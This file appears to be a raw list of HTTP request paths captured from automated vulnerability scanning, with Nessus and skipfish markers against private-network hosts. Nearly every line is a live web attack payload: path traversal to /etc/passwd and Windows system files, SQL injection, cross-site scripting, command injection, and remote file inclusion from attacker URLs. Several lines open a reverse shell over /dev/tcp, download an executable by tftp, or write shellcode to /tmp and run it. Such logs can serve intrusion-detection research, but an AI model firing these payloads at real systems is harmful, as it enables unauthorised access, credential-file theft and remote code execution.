/cgi-local/gw5/gwweb.exe?htmlver=aaa&get-context
/8t9v8k7x.x?
/cacti/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00
/javascript/subscriber.exe
/en-us/9kr0ih0v.idc?
/module/forum/forum.php?fd=http://192.168.202.118:8080/moclyxlwqyfjnp?=';
/scripts/s_form.cgi
/l4fz1dqw.dll?
/examples/jsp/jsp2/el/index.php?cat_select=
/w4996nr0.htm?
/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"
/manager/minis.php?month=../../../../../../etc/passwd
/help.php?q=&ver\x0c>q36742672&rem\x0c
/169okeyj.jspa?
/examples/jsp/sessions/sendtemp.pl?templ=../../../../../etc/passwd
/169okeyj.dll?
/phpmyadmin/sfi9876.exe
/scripts/testcgi.exe
/nyvbv05h.cgi?
/transcript_smile/
/lmw4r201.htm?
/examples/servlets/servlet/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog
/murphy's_law/
/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331904397
/scripts/.htaccess.save
/l13b77e5.exe?
/javascript/new.exe
/examples/jsp/checkbox/misc/audio.php?recording=../version.inc
/web-scripts/
/scripts/backend/classes.php?include_path=../lib/jinzora.js\x00
/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/swgnhpydbq0t?
/javascript/tpl.exe
/hjdzm96v.asp?
/igtf0zon.cfm?
/cacti/index.php?search='>&searchmode=f
/subscriptionlanding/
/recordings/protection.php?action=logout&siteurl=/etc/passwd
/ap58k3ci.php3?
/top.php?stuff="ver;>q17781936&rem;
/htbin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/phpmyadmin/index.php?sensor_program=
/help.php?q=&ver\x09>q99913985&rem\x09
/hjdzm96v.jsp?
/javascript/2012.exe
/zmvq66jy.aspx?
/htbin/fileseek2.cgi?foot=;cat /etc/passwd&head=
/javascript/hadoop.exe
/fa8p8lr8.jsp?
/snpfiltered.pl?t=c&u=
/esmozg5d.mscgi?
/javascript/definitions.exe
/nuh3zirz.aspx?
/v3axg1p8.exe?
/script/param/param.inc.php?path_inc=@rfiurl
/tukodz3j.html?
/9kr0ih0v.do?
/top.php?stuff="rm,q67251581&rem,
/manager/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/7u1pb2xi.cfc?
/main.php?logout="rm\x0cq94269861&rem\x0c
/javascript/jakarta.exe
/cgi-bin/index.php?gadget=glossary&action=view&term=
/1qwv2p5p.cgi?
/scripts/pmwiki.php
/main.php?stuff="rm\x09q42253935&rem\x09
/scripts/ui/login?user=nessus-1331904647
/encodingdescriptions/
/zmvq66jy.jspa?
/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
/examples/jsp/cal/index.php?user_langue=../../../../../../../../../../etc/passwd
/examples/jsp/cal/index.php?post=../config/password
/scriptorium/
/eesubscription_ps/
/search.asp?search=\"><script>alert(vulnerable)</script>
/examples/jsp/jsp2/el/review.php?id=1&cat=&subcat=">
/examples/jsp/num/athenareg.php?pass= ;id
/main.php?stuff="|ping -w 8000 -n 1 4.3.2.1|rem
/examples/jsp/checkbox/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332008335','5'--
/javascript/sources.exe
/examples/jsp/cal/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold
/main.php?logout="ping;-w;8000;-n;1;1.2.3.4|rem;
/examples/jsp/jsp2/jspx/data/fetch.php?page='
/recordings/lang/index.php?file=/etc/passwd
/javascript/xmlrpc.exe
/j4rdyhw8.fts?
/javascript/osc.exe
/ybz5rz7a.do?
/help.php?q='del q24159687 #
/cgi-local/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
/help.php?q="ver,>q11574297&rem,
/cgi-bin/cvslog.cgi?file=
/examples/jsp/colors/ftp/ftp.pl?dir=../../../../../../etc
/l'hermitage prepare pour henry de valois/
/examples/jsp/checkbox/nessus">/
/help.php?q=';sleep\x0911\x09#
ftp://192.168.27.103/*
/help.php?q="&ver;>q11575615&rem;
/help.php?q=";rm\x09q51344488\x09#
/manage-subscriptions/
/examples/jsp/error/calendar.php?serverpath=/etc/passwd\x00
/argument_transcripts/
/mv8wxfy9.nsf?
/examples/jsp/cal/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd
/javascript/anon.exe
/top.php?stuff="\x0adel\x09q52122221\x09#
/scripts/index.php?op=default&date=200607' union select 1,1900403573,1,1,1,1,1,1,1,1--&blogid=1
/cgi-915/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go
/6n7aacgg.jsp?
/..\..\..\..\..\..\temp\temp.class
/scriptingarchive/
/rbec2ohx.do?
/sysuser/docmgr/rename.stm?name=
/1passwd/
/cacti/embed/day.php?path=/etc/passwd\x00
/help.php?q="&ver\xa0>q93363383&rem\xa0
/yec'hed/
/examples/jsp/jsp2/el/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
/9ko6m4c8.html?
/7uz3ok60.pl?
/b5xdqgz2.cfc?
/index.php?config["sipssys"]=http://192.168.202.96:8080/4dckqcc0acprbz?
/scripts/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd
/phpmyadmin/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'--
/scripts/ui/login?user=nessus-1331904328
/top.php?stuff=';rm\x09q48683432\x09#
/qb2xy9aw.do?
/cgi-sys/.htpasswd
/
/scriptomania by norouzi/
/failure.asp?err_txt=texttext
/examples/jsp/jsp2/el/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00
/rpc/..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og
/cgi/ppdscgi.exe
/cgi-bin/phf.cgi?qalias=x\x0a/bin/cat /etc/passwd
/e9rx3ya4.html?
/javascript/decrypted.exe
/script/ident/identification.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?
/scripts/calendar.php?month=' union select 1,1,'1332009306','calendarix_month_sql_injection.nasl',1 #
/zuihld5m.exe?
/top.php?stuff=\x0auname >q36414262 #
/b4vng02k.idc?
/search.php?zoom_query=
/cgi-bin/print.php?what=article&id='
/8t9v8k7x.cfm?
/scripts/productsbycategory.asp?intcatalogid=3'&strcatalog_name=nessus
/cgi-bin/search.jsp?q=%"
/cgi-bin/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00
/webdav/phprun.php?cmd=wce.exe
/fulldescription/
/main.php?logout=uname\x09>q57845343\x09#
/cgi-bin/index.php?module=
/cgi-bin/.passwd
/daddy's worst nightmare 2/
/scripts/wrap
/base_local_rules.php?dir=
/cgi-perl/fileseek.cgi?foot=;cat /etc/passwd&head=
/oie504mr.jspa?
/d44uk9h2.dll?
/examples/jsp/colors/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/examples/jsp/error/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00
/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331908861,1,1,1,1,1,1,1--&blogid=1
/cgi-bin/r.cgi?file=../../../../../../../../../../etc/passwd
/en-us/i686v90l.pl?
/examples/jsp/num/mapserv.exe?map=mapserver_detect.nasl.map
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+5f5+>>ctdn
/newsarchive.php?path_to_script=http://cirt.net/rfiinc.txt??&cmd=ls
/ny1b3qq4.php3?
/vwmg565s.cfc?
/cgibin/view_item?html_file=../../../../../../../../../../etc/passwd\x00
/ht8pn8uq.php?
/help.php?q='&uname #
/subscriptions.sh
/hrttz9fj.php3?
/clockscriptlet/
/main.php?stuff="rm\x09q84368944\x09#
/examples/servlets/servlet/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
/ap58k3ci.cfm?
/examples/jsp/jsp2/jspx/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd
/htbin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf
/javascript/gb.exe
/vac1l5vm.cfm?
/main.php?logout='del\x09q24187781\x09#
/lsoix5h3.php3?
/u95h6ymu.html?
/javascript/device.exe
/javascript/htpasswd.trace
/examples/jsp/error/sojourn.cgi?cat=../../../../../etc/passwd\x00
/javascript/tr.exe
/search.php?searchstring=
/en-us/.do
/zroo33l4.php3?
/main.php?logout=ver >q61134549&rem
/examples/jsp/cal/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00
/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null --
/crosssitescripting/
/0u75ldxq.cgi?
..\..\..\..\..\..\..\..\..\..\boot.ini
/h4bi26jd.x?
/manager/includes/config.php?relative_script_path=http://xxxxxxx
/scripts/syncml/index.php
/test.php?evalme=eval($_server[http_x_pwzylftyuzjks]);
/egaet53a.jspa?
/examples/jsp/cal/index.php?id='union/**/select/**/0,0,1645029612,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/fa8p8lr8.htm?
/footer.inc.php?la_pow_by=
/basilix.php3?requestid=dummy&password=secu&request_id[dummy]=../../../../etc/passwd&username=sec
/jw64yq8u.fts?
/javascript/views.exe
/xlj7h65o.exe?
/phpmyadmin/includes/db_adodb.php?basedir=/etc/passwd\x00
/subscriptions.do
/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1 foo>
/scripts/getpassword.php
/l4fz1dqw.php?
/zln2hm2z.dll?
/0u75ldxq.x?
/scripts/webmail.exe
/modules.php?op=modload&name=guestbook&file=index&entry=
/en-us/account/index.php?chemin=../../../../../../..//etc
/javascript/gsm.exe
/scripture_gifts/
/examples/jsp/sessions/mylog.html?screen=/etc/passwd
/examples/jsp/cal/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w
/scripts/kfzqb5x87lvq.cgi
/scripts/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x
/top.php?stuff=";del q25742723 #
/javascript/intl.exe
/i2n4v4rl.aspx?
//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/javascript/srv.exe
/help.php?q="&del q71917693&rem
/?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+del+esbq
/javascript/abcd.exe
/scgi-bin/ion-p.exe?page=c:\winnt\repair\sam
/script/
/ju0u7kfo.x?
/7uz3ok60.nsf?
/examples/jsp/error/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00
/javascript/joe.exe
/m2fpztty.asp?
/bmeun223.jsp?
/i7prbs22.x?
/scripts/rihzp7swr3p6.asp
/606wkcop.kspx?
/j2kdmfw4.kspx?
/examples/jsp/jsp2/jspx/search.php?submit=true&search=');
/lil'-pimp/
/88ss.exe/
/aj3pf49c.kspx?
/nuh3zirz.asp?
/javascript/beans.exe
/5qnlm5z2.cfm?
/uvazfs7p.cgi?
/twiki/bin/view/main/twikiusers?rev=8 `0<&206-;exec 206<>/dev/tcp/192.168.202.96/22943;sh <&206 >&206 2>&206`#
/javascript/excalibur.exe
/yef5f3d5.html?
/fa8p8lr8.nsf?
/en-us/
.aspx
/javascript/.htpasswd.sfish/bogus\x0askipfish-inject:bogus
/readmore.php?config["sipssys"]=http://192.168.202.118:8080/zz5thkvtmlgl?
/fo564rei.jsp?
/manager/sojourn.cgi?cat=../../../../../etc/passwd\x00
/top.php?stuff="ver&rem;
/zv8tv7h8.fts?
/eg2u8pbv.fts?
/examples/jsp/error/hw3.cgi?daysonly=0).system('id').(
/ot-scripture/
/script/fckeditor/editor/filemanager/browser/default/connectors/test.html
/examples/jsp/jsp2/el/index.php?album=../../../../../../../../../../etc/passwd\x00
/examples/servlets/servlet/shopper.cgi?newpage=../../../../../../etc/passwd
/do_inscript1/
/examples/jsp/colors/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1
/d5a5renl.cfc?
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "h\0300\0250\0312fh\0002\0000\0307\0203\0211\0340j\0020pr" >> /tmp/gjehhrjnrx0;echo|awstats769839.txt
/npasswd/
/yef5f3d5.exe?
/mailarticle.php?id='union select 0,0,0,0,0,0,username,password,0,0,0,0,0,0,0,0,0 from cc_admin/*
/3hlysl2x.php?
/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 438328228--
/examples/jsp/checkbox/tinybrowser/upload.php?badfiles=1>
/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00
/phpmyadmin/search.php?searchstring=
/en-us/i686v90l.kspx?
/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/ghl9il?
/scripts/rss.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il??
/bn857frh.php?
/examples/jsp/jsp2/jspx/core/editor.php?editor_insert_bottom=/etc/passwd
/scripts/nckowqpd4zng.inc
/internal.sws?../../../../../../../../winnt/win.ini
/scripts/ggvfa_wichxq.inc
/cgi-bin/dbmlparser.exe
/0qhcnefz.jsp?
/javascript/document.phtml
/javascript/crm.exe
/main.php?stuff="rm\xa0q63696925&rem\xa0
/cacti/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00
/169okeyj.htm?
/u8yiqilu.asp?
/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/././././././../../../../../etc/passwd
/e9rx3ya4.cfm?
/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
/javascript/fun.exe
/examples/jsp/jsp2/jspx/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00
/main.php?stuff=&ver;>q39916466&rem;
/b5xdqgz2.kspx?
/javascript/link.exe
/javascript/donate.exe
/scripts/6gl21a1hiz3s.cgi
/recordings/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini
/javascript/sql.exe
/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\x00
/?
/zuihld5m.x?
/scripts/buoalakxhatu.shtml
/jujgxwav.asp?
/examples/jsp/errorsearch_results.dot?search_query=nessus">/
/examples/jsp/num/sgdynamo.exe?htname=
/en-us/.cfc
/recordings/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
/help.php?q="rm\x0cq43893615&rem\x0c
/examples/jsp/jsp2/el/index.php?show=/etc/passwd
/j4drbkil.php3?
/main.php?stuff="ping\x09-w\x099000\x09-n\x091\x091.2.3.4|rem\x09
/cgi-bin/shoutbox.php?conf=../
/help.php?q="ping,-w,8000,-n,1,4.3.2.1|rem,
/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331905170
/phpmyadmin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331923200
/javascript/.passwd.trace
/d5a5renl.pl?
/outreach.exe
/scripts/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org
/apavxugx.php?
/javascript/.htaccess/'"
/cgi-bin/fileseek2.cgi?foot=&head=;cat /etc/passwd|
/h5i6crm3.jsp?
/en-us/account/port.php?proto=tcp'
/j4rdyhw8.idc?
/cgi-bin/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass=
/g3w7y7u5.cfc?
/examples/jsp/jsp2/jspx/includes/db_adodb.php?basedir=/etc/passwd\x00
/phpmyadmin/index.php?template=../../../loudblog/custom/config.php\x00
/help.php?q=&uname >q52514762 #
/manager/catalog.php?action=category_show&id='
/javascript/snoop.exe
/webcgi/view_item?html_file=../../../../../../../../../../etc/passwd\x00
/main.php?stuff=';uname >q74863224 #
/phpmyadmin/minis.php?month=../../../../../../etc/passwd
/cacti/more.php?id=1'
/169okeyj.dll?
/base_local_rules.php?dir=
/javascript/_private.exe
/language.php?data_dir=/etc/passwd\x00
/scripts/index.pl
/phpmyadmin/forumdisplay.php?fid=21">
/cgi-bin/ssi//../../../../../../../etc/passwd
/examples/jsp/error/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/javascript/foto.exe
/606wkcop.jspa?
/examples/jsp/colors/shared/help.php?page=../../../../../../../../../../etc/passwd\x00
/main.php?logout=;sleep\x0911\x09#
/cgi-bin/index.php?id=egyb16sayu'
/examples/jsp/sessions/search.php?searchstring=
/phpnews130-xss/
/eg2u8pbv.jspa?
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/bxtfwlgmsj0+>+/dev/null+&')."]=1
/
/t3af3tdz.php?
/javascript/.htpasswd.sfish/`uname`
/cacti/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/top.php?stuff="&del\x09q38641956\x09#
/qczkquis.do?
/en-us/w4996nr0.kspx?
/ap58k3ci.do?
/7u1pb2xi.cfc?
/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00
/w4996nr0.x?
/nuh3zirz.exe?
/?
/help.php?q="&ping\x0c-w\x0c11000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/scripts/index.php?option=frontpage&itemid=2|system(id)|1331904438
/examples/jsp/jsp2/jspx/js/scripts.php?load=/etc/passwd\x00
/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,359553433,0,0,0,0,0--
/javascript/document.class
/esmozg5d.jspa?
/help.php?q="ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/sysuser/docmgr/ftp.stm?path=
/examples/jsp/colors/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl
/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/examples/jsp/sessions/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd
/examples/jsp/error/phf?qalias=x\x0a/bin/cat /etc/passwd
/main.php?stuff="ping -w 11000 -n 1 4.3.2.1|rem
/
/scripts/index.php?option=frontpage&itemid=2|system(id)|1331919001
/javascript/resolve.exe
/jnt3f86c.do?
/main.php?logout="\x0auname\x09>q94356566\x09#
/examples/jsp/colors/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x
/examples/jsp/num/profil.php?id=1
/examples/jsp/num/download.php?language=/etc/passwd\x00
/n1afe1y6.jspa?
/en-us/7o5qp766.pl?
/iv5vkgam.jsp?
/t578vqea.pl?
/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd\x00
/scripts/gdxlwjnlsr6i.cgi
/fc9t54l7.cfc?
/c:\system32\cmd.exe
/examples/jsp/colors/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00
/o6ebbirj.dll?
/gy23xnjq.jspa?
/help.php?q='\x0ddel q58812882 #
/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331909358
/l13b77e5.do?
/zroo33l4.pl?
/scripts-r0/
/606wkcop.aspx?
/examples/jsp/jsp2/jspx/base_local_rules.php?dir=
/help.php?q=;uname >q31144684 #
/t578vqea.php?
/raptor_passwd/
/examples/jsp/checkbox/ftp/ftp.pl?dir=../../../../../../etc
/en-us/33y9gcqq.cfc?
/cgi-bin/test.bat?|dir ..\\..\\..\\..\\..\\..\\..\\..\\..\\
/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/2aibfaczmac8?
/scripts/d3z7yywpyeoa.shtml
/scripts/admin/o12guest.mdb
/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file¤tfolder=/bck.jsp\x00
/n9xlumt5.aspx?
/dslpwt15.php?
/top.php?stuff="&rm\x09q26831864\x09#
/examples/jsp/checkbox/index.php?cid='
/scriptablefields/
/azcrfs8d.htm?
/help.php?q="rm\x0bq49522765&rem\x0b
/examples/jsp/jsp2/el/ftp/ftp.pl?dir=../../../../../../etc
/b1q8bywu.idc?
/cacti/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349
/scripts/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd
/main.php?frm_daynight=q33918212&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=&scr_width=
/
/main.php?stuff=';del\x09q26313493\x09#
/bzuf9ozq.htm?
/examples/jsp/cal/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00
/cgi-bin/cgi-test.exe
/javascript/push.exe
/script/gestion/index.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?
/
/g8nu2yy7.jsp?
/ttxssh2_100alpha2/
/s7qus4g3.php3?
/scripts/bpk_bsfe_4vq.cgi
/top.php?stuff="|ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c
/iisadmpwd/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og
/script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?
/7dbjwpw6.htm?
/scripts/login_page.php
/help.php?q="ping\x0c-w\x0c11000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/examples/jsp/cal/index.php?include_files[]=&include_files[query_string]=/etc/passwd
//
/miz4r5hz.htm?
/examples/jsp/colors/sendtemp.pl?templ=../../../../../etc/passwd
/help.php?q="&del,q17457396&rem,
/shell-scripts/
/cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
/examples/jsp/num/showproduct.php?product=1'
/javascript/realestate.exe
/zmvq66jy.php?
/javascript/coldfusion.exe
/help.php?q="|ping\x0b-w\x0b11000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b
/weq93ppb.idc?
/scripts/4rzefq7dsowk.php3
/prxdocs/misc/prxrch.idq?citemplate=../../../../../../../../../../winnt/win.ini
/scripts/index.php?id=0rop9yeuxw'
/606wkcop.cfm?
/phpmyadmin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini
/egaet53a.cgi?
/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,122468218,0,0,0,0,0--
/examples/jsp/error/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1
/help.php?q='\x0adel q56533456 #
/lmw4r201.fts?
/examples/servlets/servlet/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/phpmyadmin/phpnews/sendtofriend.php?mid='1'
/iv5vkgam.php?
/help.php?q='\x0auname\x09>q61575727\x09#
/examples/jsp/colors/kb.cgi?view='&lang=en
/javascript/fbook.exe
/javascript/personal.exe
/nessus">/
/fa8p8lr8.cfc?
/awstats/awstats.pl?migrate=|echo;/./tmp/qcywjpzuja0 > /dev/null &;echo|awstats668269.txt
/main.php?stuff="&ver >q89179194&rem
/pxagj7n7.php3?
/javascript/.htpasswd.sfish/skipfish~string
/7u1pb2xi.jspa?
/en-us/h5sc3gxy.cfm?
/yver8r9o.cfc?
/aj3pf49c.exe?
/en-us/fo564rei.kspx?
/recordings/includes/db_adodb.php?basedir=/etc/passwd\x00
/ao22ww7y.php?
/nsn/..\util/chkvol.bas
/scripts/awstats.cgi
/cgi-bin/view_item?html_file=../../../../../../../../../../etc/passwd\x00
/cfide/scripts/ajax/fckeditor/
//
/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010410',null,null,null,null --
/msagent-vbscript/
/examples/jsp/sessions/whois.cgi?action=load&whois=;id
/scripts/roschedule.php
/0u75ldxq.html?
/main.php?stuff="&ver\x0b>q72441193&rem\x0b
/33y9gcqq.asp?
/tuwjta1w.php?
/scripts/prnnucptkixl.html
/examples/jsp/jsp2/el/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
/main.php?stuff="\x0ddel\x09q27469451\x09#
/gy23xnjq.exe?
/cgi-bin/cal_week.php?op=week&catview=999'
/javascript/standards.exe
/scripts/irbf6nj7oyfh.cfm
/d7ktpmcq.php?
/javascript/appl.exe
/a0imiuf1.mscgi?
/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
/cgibin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/vmi8bb12.php?
/examples/jsp/error/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00
/recordings/faxsurvey?cat /etc/passwd
/javascript/document.ppt
/phpmyadmin/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/javascript/seed.exe
/javascript/d.exe
/cgi-sys/gw5/gwweb.exe?help=bad-request
/examples/jsp/cal/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
/htpasswd/
/examples/jsp/jsp2/jspx/survey.inc.php?path=/etc/passwd\x00
/en-us/account/simple/view_page?mv_arg=|cat /etc/passwd|
/scripts/cal_week.php?op=week&catview=999'
/main.php?logout="&rm q83422114 #
/javascript/manifest.mf.exe
/logo's fabrikanten/
/examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\x00
/examples/jsp/colors/listrec.pl?app=qmh-news&template=;ls /etc|
/m2fpztty.cfc?
/script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?
/scripts/pssdseehtgdp.php3
/scripts/wd7crx47eaml.php
/v3axg1p8.idc?
/scripts/whois.php?query=|id
/examples/jsp/jsp2/el/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/phpmyadmin/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/main.php?logout="&ver >q52615858&rem
/ygkjkngd.idc?
/top.php?stuff=;uname #
/recordings/includes/config.php?relative_script_path=http://xxxxxxx
/help.php?q="|ping\x0c-w\x0c7000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c
/xoops_lib/modules/protector/notification.php?mydirname=a(){}echo(md5('xoops_2_3_2brce'));function+v
/htbin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/en-us/h5sc3gxy.kspx?
/if69ddo1.exe?
/bin/gw5/gwweb.exe?htmlver=aaa&get-context
/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/ghl9il?
/5o9zq43e.php?
/javascript/1992.exe
/ydexw8by.php3?
/main.php?stuff="|ping,-w,7000,-n,1,4.3.2.1|rem,
/add.php3?url=ja&adurl=javascript:
/top.php?stuff="&rm,q38169729&rem,
/main.php?logout=\x0duname >q42999467 #
/main.php?stuff="&ping\xa0-w\xa08000\xa0-n\xa01\xa01.2.3.4&rem\xa0
/cgi-home/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/0w155a7c.dll?
/examples/jsp/colors/awstatstotals.php?sort={${phpinfo()}}{${exit()}}
/examples/jsp/num/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
/scripts/starnet/addons/slideshow_full.php?album_name='1840670444
/eg2u8pbv.aspx?
/scripts/db_input.php
/en-us/
.kspx
/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/iroy1gvqrrqu?'
/top.php?stuff=&uname >q42552299 #
/odzk29aa.do?
/scripts/8obtsg.exe?/x+/c+tftp -i 192.168.202.118 get nzbobuyh pnrwmkim.exe
/shoutbox.php?conf=../../../../../../../etc/passwd
/scripts/b0j2ijssh6cu.inc
/azcrfs8d.php?
/33y9gcqq.jspa?
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908727
/en-us/
/javascript/htpasswd.yml
/cgi-win/gwweb.exe?help=bad-request
/scripts/admin.asp
/oie504mr.jsp?
/d765w06j.idc?
/././././././../../../../../windows/win.ini
/
/index.php?page=../../../../../../../../../../../../../../../etc/passwd
/scripts/logs/hcdiskquotaservice.csv
/recordings/index.php?gadget=glossary&action=viewterm&term=
/javascript/balance.exe
/jdx255ea.php?
/z'terminator_1/
/examples/servlets/servlet/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_h0jv924_]));die;/*
/javascript/msadc.exe
/0rufe52p.nsf?
/vac1l5vm.php3?
/uc3w3bdi.html?
/javascript/ubuntu.exe
/5o9zq43e.nsf?
/scripts/cxvae_g3rjys.cfm
/ywaxntrx.jspa?
/init.php?scriptpath=http://cirt.net/rfiinc.txt??
/scripts/qg9h0c0svvat.html
/main.php?logout=rm;q21667624&rem;
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+50+6a+0c+e8+0c+00+00+00+50+8d+5d+27+53+ff+d0+91+5a+5f+eb+6b+60+89+e5+60+31++>>ctdn
/scripts/u7m5ok8eqpfy.php
/gstranscripts/
/fo564rei.php?
/examples/servlets/servlet/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@
